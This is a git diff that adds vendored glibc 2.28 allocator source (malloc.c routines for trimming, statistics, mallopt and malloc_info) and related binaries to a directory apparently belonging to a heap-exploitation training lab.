+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so
new file mode 100755
index 0000000..ef53b5e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2
new file mode 120000
index 0000000..695c5dc
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so
new file mode 100755
index 0000000..e6d084e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6
new file mode 120000
index 0000000..695ffa0
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..e247c77
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c
@@ -0,0 +1,5593 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
